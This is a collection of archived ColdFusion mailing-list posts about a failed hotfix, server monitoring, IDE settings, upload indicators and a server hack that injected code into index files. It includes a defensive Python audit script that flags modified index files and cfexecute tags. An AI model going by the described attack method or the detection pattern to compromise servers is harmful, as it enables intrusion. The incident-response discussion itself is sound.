Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Sun, Dec 25, 2011 at 4:18 PM, Phillip Vector vec...@mostdeadlygame.com wrote:

*nods* I was looking for city and state actually. and it would need to be free. I can't drop $370 on this.

Re: URGENT: problem with latest hotfix
Did you ensure that all the old jar files referenced in point 5 were removed? You need to stop all the instances and remove the jar files, then attempt to restart.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Wed, Dec 14, 2011 at 9:14 PM, John M Bliss bliss.j...@gmail.com wrote:

Event Type: Error
Event Source: ColdFusion 8 Application Server
Event Category: None
Event ID: 263
Date: 12/14/2011
Time: 2:59:12 PM
User: N/A
Description: The ColdFusion 8 Application Server service killed process with pid 6916 (no such PID running on server any longer).

Event Type: Error
Event Source: ColdFusion 8 Application Server
Event Category: None
Event ID: 261
Date: 12/14/2011
Time: 2:59:12 PM
User: N/A
Description: The ColdFusion 8 Application Server service could not be started within 240 seconds. Increase the server startup timeout value using C:\ColdFusion8\runtime\bin\jrunsvc.exe -starttimeout seconds ColdFusion 8 Application Server.

On Wed, Dec 14, 2011 at 3:02 PM, Wil Genovese jugg...@trunkful.com wrote:

what error? and read this on the subject of a patch failing
http://www.trunkful.com/index.cfm/2011/3/7/When-the-Patch-Fails

Also, if the Feb Security patch also broke CF 8.0.1 if HotFix 4 was not already applied.
http://www.trunkful.com/index.cfm/2011/3/31/ColdFusion-Security-Update-Breaks-ColdFusion

Wil Genovese
Sr. Web Application Developer/ Systems Administrator
CF Webtools
www.cfwebtools.com
wilg...@trunkful.com
www.trunkful.com

On Dec 14, 2011, at 2:59 PM, John M Bliss wrote:

Following instructions for 8.01 here: http://kb2.adobe.com/cps/925/cpsid_92512.html ...and CF Server service is not starting back up. Anyone have any advice for me?

-- John Bliss - http://about.me/jbliss

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:349146

Re: URGENT: problem with latest hotfix
Out of curiosity, did you perform the steps in Section 1 or Section 2?

Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Wed, Dec 14, 2011 at 9:26 PM, John M Bliss bliss.j...@gmail.com wrote:

Yes. I (of course) did it quickly because I was attempting to keep downtime to a minimum:

- click yes on the are you sure you want to delete dialog
- see that files are gone
- click start service

On Wed, Dec 14, 2011 at 3:19 PM, Donnie Bachan (Gmail) donnie.bac...@gmail.com wrote:

Did you ensure that all the old jar files referenced in point 5 were removed? You need to stop all the instances and remove the jar files, then attempt to restart.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:349148

Re: URGENT: problem with latest hotfix
Out of curiosity, did you follow steps in Section 1 or Section 2?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:349149

Re: Question about hack
Hi Mark,

I only mentioned cfexecute because of the permissions set on our specific case. Your info seems most likely. I did notice that there was a cfm file created with a call to cfexecute on the webroot so this should be a check as well.

best regards
Donnie

On 4/13/09, Nick Gleason n.glea...@citysoft.com wrote:

Donnie, Mark,

Our research so far seems to support Mark's analysis of this problem. There are still some unknowns here so that may change. But, changing your FTP accounts and setting your FTP server to ban IPs after a certain number of failed login attempts will prevent most brute force attempts on FTP. Our server admin didn't do that which appears to have been a mistake.

Nick

-Original Message-
From: Mark Kruger [mailto:mkru...@cfwebtools.com]
Sent: Monday, April 13, 2009 1:14 PM
To: cf-talk
Subject: RE: Question about hack

Donnie,

I believe this is the same attack I have been helping another customer with and it does not appear to be related to CF. Instead, it appears to start with a malware install of some kind on the server (and possibly a root kit) and then progress to the creation of accounts and the changing of file permissions. Another theory gaining weight (and illustrating that we don't know much yet) is that this attack is an agent on a client computer that piggybacks onto FTP - which explains a few things but not everything. I'm guessing some combination at this point.

Anyway, I agree that cfexecute is a dangerous tag that needs to be controlled, but it does not appear to be the culprit. All of this advice is good, but the only place that CF comes into play on this particular hack happens to be the propensity to use index.cfm as the home page script. The attack targets index.* files and affects (on the server I am working with) Index.cfm, index.html and index.php etc.

-Mark

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321565

Re: Server Monitoring
I second Nagios. You can monitor the port required and get alerts by email or sms (if available)

On 4/14/09, Mike Chabot mcha...@gmail.com wrote:

Oops. You did mention that you run CF8. Have you explored the monitoring feature built into CF8 yet?

-Mike Chabot

On Tue, Apr 14, 2009 at 10:04 AM, Mike Chabot mcha...@gmail.com wrote:

If your goal is to diagnose a mystery database issue that is a definite problem, I would use a database monitoring tool, such as MS SQL Profiler. Are you aware of the professional database monitoring tools, such as the ones Quest and Idera make? Where Web site monitoring of the database helps is to ensure that the Web server can connect to the database server, but that doesn't sound like the problem you are describing. What database are you running and what version of CF are you running? I ask about the CF version because CF8 has the query profiling feature built into it, although I would still favor a database query analysis tool if you know the problem is the database.

-Mike Chabot

On Tue, Apr 14, 2009 at 10:27 AM, Rob Parkhill robert.parkh...@gmail.com wrote:

Good Day,

Can't come up with a better title, so here is what I want to do. I have two servers, one DB and one web. My DB server is having MASSIVE issues at the moment. CPUs blowing up, and the server shutting down randomly, at night. I would like to use the webserver (with CF8) to monitor the status of the DB server, and was wondering what everyone thought was the best method?

I was thinking of checking to see if the domain server (which is controlled by the DB server) was in existence, although I am not sure if that is possible with CF. The other thing I could test would be the connection to the database, but I can't seem to find the references to accessing the admin tools in CF8, where I thought that would be possible, so any resource direction would be much appreciated.

Thanks,
Rob

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321573

Re: Question about hack
Hi Nick,

I know this post is a bit late but to your original question, that attack is as a result of incorrect file/iis permissions and is not an XSS attack. I would even bet that you are on a shared server (at HMS) since one of my client sites had this exact same problem. The attacker would have gained access to the file system (possibly via FTP) and executed code that injected the code into all index.* files on the server (not just your hosting account). We have had a lot of problems trying to get this sorted out. It appears that the issue was with security related to the windows script host and/or CFEXECUTE. The only thing you can do to prevent this is work with your hosting provider to secure the system or move to a VPS or dedicated account and make sure your FTP accounts are secure.

HTH
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Mon, Apr 13, 2009 at 1:30 PM, Richard White rich...@j7is.co.uk wrote:

hi dave, i have scripts that write to the file system as well. what would i need to do to secure them, do you have a link that i could read in relation to this as i am a little lost as to what to do thanks

We are having to scrub our files to remove the injected code (which is being written directly to the files as the result of the hack allowing FULL CONTROL for the Everyone user on the machine). Have you determined a solution for removing/preventing this?

First, audit your code to find any scripts that can write to the filesystem.
Second, audit your code to find any scripts that pass unfiltered user input to the database.
Third, fix that code.
Fourth, configure filesystem permissions properly to prevent CF or your database from writing to the web server's webroot.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321551

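Added example, not code from any poster in this thread: a webroot audit covering the two checks raised in the "Question about hack" messages, namely files containing a cfexecute call and index.* files that no longer match a known-good copy. The baseline manifest (hashes taken from a clean backup or deployment), the function names and the sample tree built by demo_findings() are assumptions; it inspects file contents only, not Windows ACLs.

```python
import hashlib
import os
import re
import tempfile

# Matches an opening <cfexecute ...> tag in any letter case.
CFEXECUTE_TAG = re.compile(rb"<\s*cfexecute\b", re.IGNORECASE)
CFML_EXTENSIONS = {".cfm", ".cfml", ".cfc"}


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def walk_files(root):
    """Yield (relative_path, absolute_path) for every file under root."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root).replace(os.sep, "/"), full


def build_baseline(root):
    """Hash a known-good tree (for example a clean backup) into a manifest."""
    return {rel: sha256_file(full) for rel, full in walk_files(root)}


def audit_webroot(root, baseline):
    """Return sorted (relative_path, reason) findings for the live webroot."""
    findings = []
    for rel, full in walk_files(root):
        stem, ext = os.path.splitext(os.path.basename(rel).lower())
        known = baseline.get(rel)
        if known is None:
            findings.append((rel, "new file"))
        elif known != sha256_file(full):
            # index.* pages were the injection target described in the thread.
            reason = "modified index file" if stem == "index" else "modified file"
            findings.append((rel, reason))
        if ext in CFML_EXTENSIONS:
            with open(full, "rb") as handle:
                if CFEXECUTE_TAG.search(handle.read()):
                    findings.append((rel, "contains cfexecute"))
    return sorted(findings)


def demo_findings():
    """Build a constructed webroot, change it, and audit it against the baseline."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, text):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as handle:
                handle.write(text)

        # Constructed known-good content.
        write("index.cfm", "<cfoutput>home</cfoutput>")
        write("index.html", "<html><body>home</body></html>")
        write("shop/cart.cfm", "<cfset total = 0>")
        baseline = build_baseline(root)

        # Constructed changes standing in for what the posters found.
        write("index.html", "<html><body>home</body></html><!-- injected -->")
        write("shop/util.cfm", '<CFExecute name="placeholder.exe"></CFExecute>')
        return audit_webroot(root, baseline)


if __name__ == "__main__":
    for rel, reason in demo_findings():
        print(f"{reason:22} {rel}")
```
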
Re: CFEclipse with Aptana
Pete,

I think for it to work correctly you need to enable line numbers in both places (General > Editors > Text Editors and within the CFEclipse Editor panels). I am using Eclipse with both Aptana and CFEclipse installed and was having a similar problem when one or the other was checked. I know that you are using the Aptana install with CFEclipse as a plugin but I don't think there is really a difference because the Aptana docs say that you have to enable line numbers by General > Editors > Text Editors (see http://www.aptana.com/docs/index.php/Displaying_or_hiding_line_numbers). If all else fails, you could always try it on a clean install with the latest updates. BTW, are you on Windows or Mac?

HTH.

Best Regards,
Donnie

On Feb 2, 2008 1:45 PM, Pete Ruckelshaus [EMAIL PROTECTED] wrote:

I have tried a variety of combinations of checking, unchecking, and rechecking the line number options in both places, to no avail. Also, if I wasn't clear, I'm using the Aptana install and not Eclipse with the Aptana plugin.

Pete

On Feb 2, 2008 10:14 AM, James Davis [EMAIL PROTECTED] wrote:

Pete,

Make sure you check the Show Line Numbers under the CFEclipse options. That threw me off when i first started using it. In the Preferences, it's under CFEclipse > Editor. If you're just checking under General > Editors > Text Editors, that Show Line Numbers option will not show line numbers in CFM pages.

James Davis
Kaleida Systems

From: Pete Ruckelshaus [mailto:[EMAIL PROTECTED]
Sent: Sat 2/2/2008 9:38 AM
To: CF-Talk
Subject: CFEclipse with Aptana

I've been using Aptana (http://www.aptana.org/) with my students in my web design class (I teach in a public school district and didn't inherit any budget for software, Aptana is both free and very very good). I've actually grown to prefer it over HomeSite+ for HTML, JS, and CSS; it's based on Eclipse, so you can install Eclipse plug-ins -- including cfeclipse -- with no problem. The only thing that's keeping me from using it for all of my ColdFusion development is that for some reason, I can't get line numbers to show when editing CFM files, and the show line numbers setting in the settings applet won't save the setting.

Has anyone else encountered this issue, and if so, is there a fix?

Thanks,
Pete

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:298004

Re: Upload progress bar
George,

I agree with the idea of just displaying some sort of animation, if something is taking too long you can always say still working...hang on! but the entire idea is to give the user an indicator letting them know that something is happening and the upload hasn't died. You will need to include proper error handling and timeouts. It really isn't something you want to spend hours on because in the end it really isn't that important to show that 10 MBs out of 100MBs have been uploaded (and if you are uploading something that big via the browser I would discourage that! IMHO).

Will,

Why limit yourself: http://www.ajaxload.info/ we

Best Regards,
Donnie

On Feb 2, 2008 11:35 AM, Will Tomlinson [EMAIL PROTECTED] wrote:

I went ahead and put up a gif I use. http://wtomlinson.com/wait30.gif

HTH,
Will

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:298008